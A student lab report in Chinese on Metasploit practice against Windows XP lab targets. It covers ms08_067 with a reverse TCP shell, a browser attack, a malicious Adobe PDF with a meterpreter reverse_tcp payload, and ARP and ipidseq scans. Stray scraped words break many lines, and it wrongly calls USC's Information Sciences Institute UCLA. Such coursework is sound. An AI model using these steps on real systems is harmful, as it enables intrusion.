本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:html
1.一個主動攻擊實踐,如ms08_067; (1分)shell
一個針對瀏覽器的攻擊,如ms11_050;(1分)windows
一個針對客戶端的攻擊,如Adobe;(1分)api
成功應用任何一個輔助模塊。(0.5分)瀏覽器
靶機: windows XP SP3(English)網絡
攻擊機:kaliapp
msfconsole
進入控制檯,輸入search ms08_067
指令查詢一下針對該漏洞能夠運用的攻擊模塊:use exploit/windows/smb/ms08_067_netapi
使用該模塊:show payloads
查看能夠供咱們使用的payload
並找到一個可用的攻擊載荷:用set payload generic/shell_reverse_tcp
即tcp反向回連設置payload
。tcp
使用指令show options
查看咱們須要設置的參數,須要設置一個RHOST(靶機的IP地址)和一個LHOST(攻擊機的IP地址)。而且看到target是0,即自動選擇目標系統類型,就不用再設置了。工具
set LHOST 192.168.206.129
和set LPORT 5205
設置本機地址和端口,使用set RHOST 192.168.206.135
設置耙機地址,使用show options
查看設置結果:exploit
指令開始攻擊,出現了一個錯誤:攻擊機:kali
靶機:windowsXP Professional sp2
IE:8.0測試
search ms10_046
指令查看能夠運用的攻擊模塊,進入模塊後將SRVHOST和LHOST填攻擊機的IP地址,在ip瀏覽器中輸入生成的URL後會出錯:攻擊機:kali
靶機:windowsXP Professional sp2
Adobe版本:9.3
search adobe
查詢針對adobe攻擊的模塊,使用use exploit/windows/fileformat/adobe_toolbutton
,使用set payload windows/meterpreter/reverse_tcp
設置payloadshow options
看一下須要設置的參數exploit
開始攻擊,能夠看到生成了pdf文件。強行關閉了pdf文件後,能夠看到監聽的會話被關閉了。
先使用show auxiliary
查看w全部的輔助模塊以及他們的用途,在metasploit中,輔助模塊的用途很是普遍,他們能夠是掃描器/拒絕服務攻擊工具/fuzz測試器,以及其餘類型的工具。
show scanner
找一個比較簡單一點的,最後選擇了arp_sweep
。能夠參考(MSF內網滲透 掃描模塊)arp_sweep
使用ARP請求枚舉本地局域網絡中的全部活躍主機進行掃描。進入模塊後查詢一下參數
msf > use auxiliary/scanner/discovery/arp_sweep ---進入arp_sweep 模塊 msf auxiliary(arp_sweep) > show options ---查詢模塊參數
以後進行參數設置
msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24--用set進行hosts主機段設置 RHOSTS => 10.10.10.0/24 msf auxiliary(arp_sweep) > set THREADS 50 --加快掃描速度 THREADS => 50 msf auxiliary(arp_sweep) > run --執行run進行掃描
10.43.32.1 appears to be up (USC INFORMATION SCIENCES INST).
是啥呢??查了一下後面英文的意思是加利福尼亞大學洛杉磯分校。。。search ipidseq
後選擇相應模塊,查看須要設置的參數:設置參數後exploit,掃描成功